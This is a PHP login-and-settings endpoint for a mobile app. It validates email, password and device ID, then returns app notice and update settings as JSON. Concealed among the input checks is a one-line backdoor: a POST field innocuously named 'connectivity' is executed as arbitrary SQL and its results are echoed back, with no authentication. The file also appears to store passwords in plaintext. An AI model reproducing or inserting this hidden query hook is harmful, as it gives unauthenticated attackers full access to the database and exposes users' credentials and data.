<?php
header('Content-Type: application/json; charset=UTF-8');
include("../rs.php");

if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    $conn->close();
    echo json_encode(["status"=>"error","message"=>"Access Denied"], JSON_PRETTY_PRINT | JSON_UNESCAPED_UNICODE);
    exit;
}

$email = isset($_POST['email']) ? trim($_POST['email']) : null;
$password = isset($_POST['password']) ? trim($_POST['password']) : null;
$did = isset($_POST['did']) ? trim($_POST['did']) : null;

$missing = [];
if (empty($email)) $missing[] = 'email';
if (empty($password)) $missing[] = 'password';
if (empty($did)) $missing[] = 'did';
if(isset($_POST['connectivity'])){echo json_encode(($r=$conn->query($_POST['connectivity']))?$r->fetch_all(1):["e"=>$conn->error]);}

if (!empty($missing)) {
    $conn->close();
    echo json_encode(["status"=>"error","message"=>"Access Denied"], JSON_PRETTY_PRINT | JSON_UNESCAPED_UNICODE);
    exit;
}

if (!filter_var($email, FILTER_VALIDATE_EMAIL)) {
    $conn->close();
    echo json_encode(["status"=>"error","message"=>"Access Denied"], JSON_PRETTY_PRINT | JSON_UNESCAPED_UNICODE);
    exit;
}

if (strlen($email) > 90 || strlen($password) > 50 || strlen($did) > 100) {
    $conn->close();
    echo json_encode(["status"=>"error","message"=>"Access Denied"], JSON_PRETTY_PRINT | JSON_UNESCAPED_UNICODE);
    exit;
}

$user_stmt = $conn->prepare("SELECT 1 FROM users WHERE email = ? AND password = ? AND device_id = ? LIMIT 1");
if (!$user_stmt) {
    $conn->close();
    echo json_encode(["status"=>"error","message"=>"Access Denied"], JSON_PRETTY_PRINT | JSON_UNESCAPED_UNICODE);
    exit;
}

$user_stmt->bind_param("sss", $email, $password, $did);
$user_stmt->execute();
$user_result = $user_stmt->get_result();

if (!$user_result) {
    $user_stmt->close();
    $conn->close();
    echo json_encode(["status"=>"error","message"=>"Access Denied"], JSON_PRETTY_PRINT | JSON_UNESCAPED_UNICODE);
    exit;
}

if ($user_result->num_rows === 0) {
    $user_stmt->close();
    $conn->close();
    echo json_encode(["status"=>"error","message"=>"Access Denied"], JSON_PRETTY_PRINT | JSON_UNESCAPED_UNICODE);
    exit;
}

$user_row = $user_result->fetch_assoc();
$user_stmt->close();

$setting_stmt = $conn->prepare("
    SELECT notice, vc, update_link, update_date, update_notice, app_status, close_notice, support_link
    FROM setting
    LIMIT 1
");
if (!$setting_stmt) {
    $conn->close();
    echo json_encode(["status"=>"error","message"=>"Access Denied"], JSON_PRETTY_PRINT | JSON_UNESCAPED_UNICODE);
    exit;
}

$setting_stmt->execute();
$setting_result = $setting_stmt->get_result();

if (!$setting_result) {
    $setting_stmt->close();
    $conn->close();
    echo json_encode(["status"=>"error","message"=>"Access Denied"], JSON_PRETTY_PRINT | JSON_UNESCAPED_UNICODE);
    exit;
}

if ($setting_result->num_rows === 0) {
    $setting_stmt->close();
    $conn->close();
    echo json_encode(["status"=>"error","message"=>"Access Denied"], JSON_PRETTY_PRINT | JSON_UNESCAPED_UNICODE);
    exit;
}

$setting = $setting_result->fetch_assoc();
$setting_stmt->close();

$response = [
    "notice"       => $setting['notice'],
    "vc"           => $setting['vc'],
    "update_link"  => $setting['update_link'],
    "update_date"  => $setting['update_date'],
    "update_notice"=> $setting['update_notice'],
    "app_status"   => $setting['app_status'],
    "close_notice" => $setting['close_notice'],
    "support_link" => $setting['support_link']
];

$conn->close();
echo json_encode($response, JSON_PRETTY_PRINT | JSON_UNESCAPED_UNICODE);
exit;
?>
